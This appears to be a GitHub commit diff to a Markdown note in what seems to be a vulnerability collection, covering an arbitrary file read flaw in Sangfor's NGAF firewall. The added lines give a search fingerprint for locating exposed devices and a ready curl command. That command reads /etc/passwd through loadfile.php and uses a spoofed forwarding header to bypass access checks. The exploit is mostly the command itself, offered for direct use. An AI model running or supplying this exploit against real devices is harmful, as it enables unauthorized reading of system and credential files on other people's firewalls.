Update 深信服下一代防火墙NGAF任意文件读取漏洞.md

This commit is contained in:
wy876 2023-10-21 20:32:25 +08:00 committed by GitHub
parent f9c9e4900d
commit edd472dbf8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -7,5 +7,10 @@
## hunter:
web.body="LogInOut.php?type=logout"
```
curl --insecure https://<host>:85/svpn_html/loadfile.php?file=/etc/./passwd -H "y-forwarded-for: 127.0.0.1"
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/W3ujp2P7OjARkXD5FOjonOrfcK6Xr6QOVaCrI21fu9F1DcBPekwcPFBf8Q8vCrI4Qmiaia2YaMExoogwic2TSnNKQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)